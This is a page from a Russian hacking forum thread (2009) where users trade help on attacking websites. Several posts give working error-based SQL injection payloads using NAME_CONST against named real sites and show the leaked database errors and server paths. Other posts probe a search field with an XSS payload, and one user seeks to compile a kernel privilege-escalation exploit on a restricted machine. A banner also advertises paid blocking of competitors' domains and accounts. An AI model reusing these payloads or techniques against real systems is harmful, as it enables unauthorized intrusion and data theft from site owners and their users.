Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 997 из 2422

997

Опции темы

Поиск в этой теме

Опции просмотра

13.11.2009, 01:39

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

Провел на форуме:
3202832

Репутация: 1588

php injection - http://forum.antichat.ru/thread12123.html
sql injection - http://forum.antichat.ru/thread43966.html
неужели трудно было самому найти

13.11.2009, 03:17

fng

Новичок

Регистрация: 12.11.2009

Сообщений: 20

Провел на форуме:
32270

Репутация: 0

[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....

Цитата:

http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*

почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(

13.11.2009, 03:21

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

Цитата:

Сообщение от fng

[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....

почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(

Вот ответ на твой вопрос:
http://forum.antichat.ru/threadnav119047-2-10.html

13.11.2009, 03:23

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

Провел на форуме:
3202832

Репутация: 1588

Цитата:

Сообщение от fng

NAME_CONST - http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_name-const

13.11.2009, 03:46

totem

Новичок

Регистрация: 25.01.2008

Сообщений: 5

Провел на форуме:
46816

Репутация: -10

как скомпилить сплойт, написанный на Си компилятором g++ ?

Цитата:

$ g++ -fno-stack-protector -o exp exploit.c
exploit.c: In function 'void extract_and_play_video()':
exploit.c:78: error: expected unqualified-id before 'template'
exploit.c:85: error: invalid conversion from 'void*' to 'char*'
exploit.c:94: error: expected primary-expression before 'template'
exploit.c:100: error: expected primary-expression before 'template'
exploit.c:102: error: expected primary-expression before 'template'
exploit.c: In function 'int own_the_kernel(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)':
exploit.c:321: error: invalid conversion from 'unsigned int*' to 'int*'
exploit.c: In function 'int pa__init(void*)':
exploit.c:354: error: invalid conversion from 'void*' to 'char*'
exploit.c:358: error: invalid conversion from 'void*' to 'char*'
exploit.c:395: error: expected unqualified-id before 'template'
exploit.c:399: error: expected primary-expression before 'template'
exploit.c:404: error: expected primary-expression before 'template'

14.11.2009, 01:18

totem

Новичок

Регистрация: 25.01.2008

Сообщений: 5

Провел на форуме:
46816

Репутация: -10

как скомпилить сплойт, написанный на Си компилятором g++ ? К компилятору gcc доступа нет.

Цитата:

$ ls -la /usr/bin/gcc
-rwx------ 2 root root 202320 May 27 2008 /usr/bin/gcc
$ ls -la /usr/bin/g++
-rwxr-xr-x 2 root root 202320 May 27 2008 /usr/bin/g++

Цитата:

13.11.2009, 12:42

razb

Постоянный

Регистрация: 24.03.2009

Сообщений: 670

Провел на форуме:
2868783

Репутация: 414

2totem

Код:

$ gcc -fno-stack-protector -o exp exploit.c

13.11.2009, 15:24

M1ks

Участник форума

Регистрация: 23.08.2007

Сообщений: 157

Провел на форуме:
1091601

Репутация: 19

нашел вроде как инъекцию в поиске, но результат вылетел какойто запутанный:

Цитата:

Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `db_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">S tack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/..../req/db/drivers/mysql/MySqlConnection.class.php on line 176

как в данном случае можно подставить запрос?

13.11.2009, 15:41

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

Провел на форуме:
3202832

Репутация: 1588

M1Ks продолжаем тему... ребята вообще тут идет такая лажа как на video.antichat.ru
когда в поле поиск вбивали кавычку и оно выдавало ошибку (все идет из-за бажного поисковика) может есть какие то способы крутить такие скули
http://rcc-penza.ru/advanced_search/
импульс на ковычку

Код:

Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.display=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176

импульс на XSS ( "><script>alert('XSS');</script> )

Код:

Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE `name` LIKE '%"><script>alert('XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AN' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.display=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.p in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176

#10

13.11.2009, 16:05

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью Yahoo

2 [x60]unu
раскручиваем как blind по методу Qwazar'a [подробнее ]

Код:

xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*

и видим 1ю таблу : CHARACTER_SETS

Последний раз редактировалось RulleR; 13.11.2009 в 16:41..

TEST SHARE BLOCK

𝕏 Twitter Reddit Telegram Копировать ссылку

Страница 997 из 2422

997

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules